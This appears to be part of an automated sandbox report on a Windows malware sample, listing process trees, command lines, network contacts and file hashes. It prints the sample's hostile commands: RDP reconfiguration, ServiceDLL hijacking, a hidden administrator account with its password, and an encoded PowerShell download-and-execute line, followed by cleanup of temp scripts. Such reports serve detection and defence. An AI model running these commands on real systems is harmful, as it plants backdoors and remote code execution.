Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3968 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3968 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 2824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2416 wrote to memory of 2824 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2824 wrote to memory of 1428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2824 wrote to memory of 1428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2416 wrote to memory of 3872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 3872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 2008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 4224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 4224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2416 wrote to memory of 4660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2416 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2416 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 4876 wrote to memory of 4896 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4876 wrote to memory of 4896 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2416 wrote to memory of 4928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2416 wrote to memory of 4928 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4928 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4928 wrote to memory of 4944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4944 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4944 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4960 wrote to memory of 4980 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4960 wrote to memory of 4980 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2416 wrote to memory of 5000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2416 wrote to memory of 5000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 5016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5000 wrote to memory of 5016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5016 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5016 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5032 wrote to memory of 5052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5032 wrote to memory of 5052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1920 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1920 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4136 wrote to memory of 4156 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4136 wrote to memory of 4156 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4176 wrote to memory of 1428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4176 wrote to memory of 1428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1428 wrote to memory of 2164 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1428 wrote to memory of 2164 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2344 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2344 wrote to memory of 2348 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2348 wrote to memory of 4232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2348 wrote to memory of 4232 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4324 wrote to memory of 4416 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4324 wrote to memory of 4416 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4416 wrote to memory of 4432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4416 wrote to memory of 4432 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4452 wrote to memory of 4492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4452 wrote to memory of 4492 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4492 wrote to memory of 4364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4492 wrote to memory of 4364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4328 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4328 wrote to memory of 4520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 4520 wrote to memory of 4256 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4520 wrote to memory of 4256 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4536 wrote to memory of 4576 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4536 wrote to memory of 4576 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe

"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF4.tmp" "c:\Users\Admin\AppData\Local\Temp\0oh2zeve\CSC73CAA211EA44F09634A317902A77D0.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc a8OeqOZ0 /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc a8OeqOZ0 /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc a8OeqOZ0 /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc a8OeqOZ0

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc a8OeqOZ0

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc a8OeqOZ0

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.kabeltex.nl udp
N/A 82.151.33.2:8080 speedtest.kabeltex.nl tcp
N/A 8.8.8.8:53 speedtest.zeelandnet.nl udp
N/A 212.115.192.180:8080 speedtest.zeelandnet.nl tcp
N/A 8.8.8.8:53 speedtest.worldstream.nl udp
N/A 185.182.195.78:8080 speedtest.worldstream.nl tcp
N/A 8.8.8.8:53 speedtest.caiw.net udp
N/A 62.45.44.26:8080 speedtest.caiw.net tcp
N/A 8.8.8.8:53 pgf5ga4g4b.cn udp
N/A 206.188.196.143:443 pgf5ga4g4b.cn tcp

Files

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

\??\c:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.cmdline

MD5 d722ad1eacd192e12df0ba2fb28951b4
SHA1 d22ba3ccb96380f57c0b1a639597a2fd84d3b090
SHA256 e813cefcca45cc4fa9959a53f2af1a877296eab8ad9312175bb3abf100b092b0
SHA512 afb7c694fdb5139f4ccec4ac9103dc4aec6a96fd20113e0bdefc1e1bdcde3f86e773757b71e7e35c38dad44f24ea260aa5885aaa5cbcb88fdbfffc56d29de23b

\??\c:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

\??\c:\Users\Admin\AppData\Local\Temp\0oh2zeve\CSC73CAA211EA44F09634A317902A77D0.TMP

MD5 7068c371e467d4f1f0ef646581709c79
SHA1 04a6971a0ac7026230918bdd618764be707f0216
SHA256 db30b6120715a4d1f2e30c58a1892dca24af57f1f0e2826cf203167e44d854c1
SHA512 6fc5ab8e42b065d07741964be6bd12f1e2118178126cfec8c665b3b3467398fc8638d7ed6ffa7833c88a178b39ad037fbaec243ded8d25fe0109fb22cc78dbeb

C:\Users\Admin\AppData\Local\Temp\RESFF4.tmp

MD5 736174f3b5b458ba1d217896a14f4b0f
SHA1 7ae1b95420d1a255777a82be4f48ff8f03a04b4f
SHA256 cb5f85407b0e80ed898a3f1bf58db26065f57af31cb2f6c697166db509ac9dad
SHA512 e656ebcb3d53a77dc810dc776e24ad7fd854fff604642557e0bf92e4ecc95af74816ebe63a66689541b1ae0fdd4f3dddcb873e0a5430d61271502e1fa0393883

C:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.dll

MD5 8307b1ccd9644ce9fca4e1e69cd4a3f1
SHA1 e8c60fbe21eeb0cc9666e40c6789864422223b6f
SHA256 f1a0be8ca304128474019504bc192fb896d58fe3c6f96ece7ff3857c7f0d8f81
SHA512 09dd084a96ee5d89cc8d9c7fa07f9506d28822e7a34327dc42677de45340d935ced4605667b64b4afb4c4ee7b4765646626329321dc2be6598d9f360f0ffe1d3

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 43473f4e719958639a9d89e5d8388999
SHA1 ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256 ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

\Windows\Branding\mediasrv.png

MD5 271eacd9c9ec8531912e043bc9c58a31
SHA1 c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

\Windows\Branding\mediasvc.png

MD5 1fa9c1e185a51b6ed443dd782b880b0d
SHA1 50145abf336a196183882ef960d285bd77dd3490
SHA256 f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc
